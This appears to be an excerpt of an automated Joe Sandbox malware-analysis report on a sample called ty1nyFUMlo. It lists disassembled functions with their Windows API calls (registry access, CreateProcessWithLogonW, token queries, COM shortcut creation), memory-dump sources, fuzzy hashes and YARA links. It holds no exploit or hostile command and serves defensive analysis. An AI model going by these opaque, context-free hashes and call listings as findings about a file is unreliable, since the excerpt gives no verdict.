                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        • Opcode ID: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
                                                                                                                        • Instruction ID: 0b7a1e224bf35d8a7f398d5ecd0e6b4f17d5088d86843c90ea5afdf2fb671657
                                                                                                                        • Opcode Fuzzy Hash: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
                                                                                                                        • Instruction Fuzzy Hash: 57F03C32542A02BBD7415FA4EE8CBE6BF39FF12702F402025F202A18A0CB749469DF90
                                                                                                                        Function 005401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 005400BA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005400D6
                                                                                                                        • __allrem.LIBCMT ref: 005400ED
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054010B
                                                                                                                        • __allrem.LIBCMT ref: 00540122
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00540140
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction ID: 8e23473207f57ba74eec83dc3c1ed4eca54db54e1dc9b9ce217cb2f8d7501e95
                                                                                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                        • Instruction Fuzzy Hash: B081F871A007069BE724AE39CC49BAB7FE9BF91328F24553AF951D76C1E770D9008B50
                                                                                                                        Function 005461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005382D9,005382D9,?,?,?,0054644F,00000001,00000001,8BE85006), ref: 00546258
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0054644F,00000001,00000001,8BE85006,?,?,?), ref: 005462DE
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005463D8
                                                                                                                        • __freea.LIBCMT ref: 005463E5
                                                                                                                          • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        • __freea.LIBCMT ref: 005463EE
                                                                                                                        • __freea.LIBCMT ref: 00546413
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                                                                                        • Instruction ID: 3fbf251d5f23bc9fb632ed8b9185025db5f5fafee3f0279a8ec4fe322b68717f
                                                                                                                        • Opcode Fuzzy Hash: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                                                                                        • Instruction Fuzzy Hash: 5751DE72600256ABEB258E64DC85FEF7FA9FB86718F144A29F805D7190DB34DC40C6A1
                                                                                                                        Function 0059BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BCCA
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BD25
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059BD6A
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0059BD99
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059BDF3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059BDFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1120388591-0
                                                                                                                        • Opcode ID: 6c2580b85a7044a8d998fa5ceee2d114bdcd195f310ef46f5c4777f7896c1f4e
                                                                                                                        • Instruction ID: 2a9319274df48716c95288e4857821f2f203e22104ad1a171ec66022f79a0c6c
                                                                                                                        • Opcode Fuzzy Hash: 6c2580b85a7044a8d998fa5ceee2d114bdcd195f310ef46f5c4777f7896c1f4e
                                                                                                                        • Instruction Fuzzy Hash: 7B819D30108242AFE714DF24D995E6ABFE9FF85308F14895CF4594B2A2DB31ED45CB92
                                                                                                                        Function 0056F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 0056F7B9
                                                                                                                        • SysAllocString.OLEAUT32(00000001), ref: 0056F860
                                                                                                                        • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F889
                                                                                                                        • VariantClear.OLEAUT32(0056FA64), ref: 0056F8AD
                                                                                                                        • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F8B1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056F8BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859894641-0
                                                                                                                        • Opcode ID: f03961c9676a9e6f348613401834b2e012481ccdec82e3e4352deb0761393dc8
                                                                                                                        • Instruction ID: bd3130b51eb21b362942704d5d13f4857b70a6ea9e97e5f70fdf2f0b091cf2e1
                                                                                                                        • Opcode Fuzzy Hash: f03961c9676a9e6f348613401834b2e012481ccdec82e3e4352deb0761393dc8
                                                                                                                        • Instruction Fuzzy Hash: AA51C831E00311BBDF20AB65F899B69BFA9FF95310F245866E905DF291DB708C40C766
                                                                                                                        Function 0058910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 005894E5
                                                                                                                        • _wcslen.LIBCMT ref: 00589506
                                                                                                                        • _wcslen.LIBCMT ref: 0058952D
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00589585
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                        • Opcode ID: d5b02622984f735ee27529465bec506c9ae1dde9b374ffe17e7c23d07c672811
                                                                                                                        • Instruction ID: 11df7cf4072da922e408185763d5ec414add65fba783ca5403043dd5de1535b1
                                                                                                                        • Opcode Fuzzy Hash: d5b02622984f735ee27529465bec506c9ae1dde9b374ffe17e7c23d07c672811
                                                                                                                        • Instruction Fuzzy Hash: 51E1B5315043019FD714EF24C885AAEBBE4BFC5314F18896DF8999B2A2DB31ED45CB92
                                                                                                                        Function 0052920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00529241
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005292A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005292C2
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005292D3
                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00529321
                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005671EA
                                                                                                                          • Part of subcall function 00529339: BeginPath.GDI32(00000000), ref: 00529357
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3050599898-0
                                                                                                                        • Opcode ID: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                                                                                        • Instruction ID: 027379cd50156cfc62f615645239b1b77b58bb2120b6ee5cc23bfec4bf28e176
                                                                                                                        • Opcode Fuzzy Hash: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                                                                                        • Instruction Fuzzy Hash: C1419F31104255AFD710DF24D884FBA7FA8FFAA724F140629F994CB2E2C7309849EB61
                                                                                                                        Function 005807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0058080C
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00580847
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00580863
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 005808DC
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005808F3
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00580921
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3368777196-0
                                                                                                                        • Opcode ID: 148bd96c62c13bfa7070749371cde9f0df2f9776d435597f58cb75904a2bf23d
                                                                                                                        • Instruction ID: 4500ba0523c5062cea205dafcd198b214d5d59c943d0a2c7110aba8eaec8f3da
                                                                                                                        • Opcode Fuzzy Hash: 148bd96c62c13bfa7070749371cde9f0df2f9776d435597f58cb75904a2bf23d
                                                                                                                        • Instruction Fuzzy Hash: 34415B71A00205EBDF55AF54EC85AAA7B78FF45310F1440B9ED00AA297DB30DE69DBA0
                                                                                                                        Function 0058581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                        • _wcslen.LIBCMT ref: 0058587B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00585995
                                                                                                                        • CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 005859AE
                                                                                                                        • CoUninitialize.OLE32 ref: 005859CC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                        • Opcode ID: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                                                                                        • Instruction ID: df1f498cf2d8dc26ba8d104b54e7ceb7076030961fc1a982c014677c50aa6180
                                                                                                                        • Opcode Fuzzy Hash: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                                                                                        • Instruction Fuzzy Hash: 7DD155716046029FC714EF24C484A6ABBF6FF89715F14485DF88AAB361EB31EC45CB92
                                                                                                                        Function 0057175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
                                                                                                                          • Part of subcall function 00570FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
                                                                                                                          • Part of subcall function 00570FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
                                                                                                                          • Part of subcall function 00570FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
                                                                                                                          • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00571335), ref: 005717AE
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005717BA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005717C1
                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 005717DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00571335), ref: 005717EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005717F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3008561057-0
                                                                                                                        • Opcode ID: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
                                                                                                                        • Instruction ID: a306c3febc59018670b8c3e746feebefba4651decdf4236d2cc456a286eb8a99
                                                                                                                        • Opcode Fuzzy Hash: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
                                                                                                                        • Instruction Fuzzy Hash: 7111BE71600605FFDB189FA8EC49BAE7FA9FB42355F108018F44597210C735A948EB64
                                                                                                                        Function 005714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005714FF
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00571506
                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00571515
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00571520
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057154F
                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00571563
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1413079979-0
                                                                                                                        • Opcode ID: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
                                                                                                                        • Instruction ID: 3de88d6edb35001512216c03d84204cd82d6485c888df2724c75c87a67a78cfc
                                                                                                                        • Opcode Fuzzy Hash: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
                                                                                                                        • Instruction Fuzzy Hash: FF112972500209ABDF118F98ED49FDE7FAAFF49744F048059FA09A2160C3758E68EB64
                                                                                                                        Function 00533382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00533379,00532FE5), ref: 00533390
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053339E
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005333B7
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00533379,00532FE5), ref: 00533409
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
                                                                                                                        • Instruction ID: f693e8de9a1fddd44ff4ea10a9246f772a41f29b1619651dd54edb8fdbc2cff6
                                                                                                                        • Opcode Fuzzy Hash: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
                                                                                                                        • Instruction Fuzzy Hash: 4201243320A313BEAB2527757C8E66B6F94FB65379F20862BF411812F0EF115D09E544
                                                                                                                        Function 00542D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00545686,00553CD6,?,00000000,?,00545B6A,?,?,?,?,?,0053E6D1,?,005D8A48), ref: 00542D78
                                                                                                                        • _free.LIBCMT ref: 00542DAB
                                                                                                                        • _free.LIBCMT ref: 00542DD3
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DE0
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DEC
                                                                                                                        • _abort.LIBCMT ref: 00542DF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
